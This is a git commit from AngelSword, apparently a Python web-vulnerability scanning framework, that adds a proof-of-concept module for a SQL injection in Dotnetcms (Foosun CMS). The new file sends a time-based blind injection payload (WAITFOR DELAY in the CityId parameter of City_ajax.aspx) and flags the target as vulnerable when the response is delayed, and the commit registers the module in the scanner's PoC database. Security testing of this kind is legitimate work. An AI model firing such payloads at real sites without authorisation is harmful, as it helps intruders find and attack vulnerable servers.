add foosun poc

2017-08-31 21:08:23 +08:00
parent 4a77ba5f86
commit 25a0c75840
7 changed files with 44 additions and 5 deletions
--- a/.history
+++ b/.history
@@ -1,2 +0,0 @@
-1|metinfo_getpassword_sqli
-2|metinfo_login_check_sqli
--- a/AngelSword.py
+++ b/AngelSword.py
@@ -337,7 +337,7 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
                        break
                sys.stdout.write("\033[1;35m[+] 加载poc: ["+keyword.__module__+"]\033[0m\n")
                sys.stdout.write("\033[1;35m[+] 发送payload..\033[0m\n")
-                sys.stdout.write("\033[1;35m[+] 正在攻击..\033[0m\n")
+                sys.stdout.write("\033[1;35m[+] 正在攻击.."+target+"\033[0m\n")
                sys.stdout.flush()
                keyword.run()
        else:
--- a/cms/cmsmain.py
+++ b/cms/cmsmain.py
@@ -6,6 +6,9 @@ referer: unknow
 author: Lucifer
 description: 包含所有cms漏洞类型，封装成一个模块
 '''
+#foosun vuls
+from cms.foosun.foosun_City_ajax_sqli import foosun_City_ajax_sqli_BaseVerify
+
 #autoset vuls
 from cms.autoset.autoset_phpmyadmin_unauth import autoset_phpmyadmin_unauth_BaseVerify

--- a/cms/foosun/init.py
+++ b/cms/foosun/init.py
--- a/cms/foosun/foosun_City_ajax_sqli.py
+++ b/cms/foosun/foosun_City_ajax_sqli.py
@@ -0,0 +1,37 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: Dotnetcms(风讯cms)SQL注入漏洞
+referer: https://silic.wiki/0day:%E9%A3%8E%E8%BF%85_dotnetcms_2.0-1.0_sql_injection
+author: Lucifer
+description: 文件City_ajax.aspx中,参数CityId存在SQL注入。
+'''
+import sys
+import time
+import requests
+import warnings
+from termcolor import cprint
+
+class foosun_City_ajax_sqli_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        payload = "/user/City_ajax.aspx?CityId=1%27WAiTFoR%20DeLAy%20%270:0:6%27--"
+        vulnurl = self.url + payload
+        start_time = time.time()
+        try:
+            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
+            if time.time() - start_time >= 6:
+                cprint("[+]存在Dotnetcms(风讯cms)SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = foosun_City_ajax_sqli_BaseVerify(sys.argv[1])
+    testVuln.run()
--- a/pocdb.py
+++ b/pocdb.py
@@ -24,6 +24,7 @@ class pocdb_pocs:
            "crossdomain.xml文件发现":crossdomain_find_BaseVerify(url),
        }
        self.cmspocdict = {
+            "Dotnetcms(风讯cms)SQL注入漏洞":foosun_City_ajax_sqli_BaseVerify(url),
            "韩国autoset建站程序phpmyadmin任意登录漏洞":autoset_phpmyadmin_unauth_BaseVerify(url),
            "phpstudy探针":phpstudy_probe_BaseVerify(url),
            "phpstudy phpmyadmin默认密码漏洞":phpstudy_phpmyadmin_defaultpwd_BaseVerify(url),
--- a/system/weblogic/weblogic_interface_disclosure.py
+++ b/system/weblogic/weblogic_interface_disclosure.py
@@ -25,7 +25,7 @@ class weblogic_interface_disclosure_BaseVerify:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)

            if req.status_code == 200:
-                cprint("[+]存在weblogic 接口泄露漏洞...(低危)\tpayload: "+vulnurl, "green")
+                cprint("[+]存在weblogic 接口泄露漏洞...(信息)\tpayload: "+vulnurl, "green")

        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")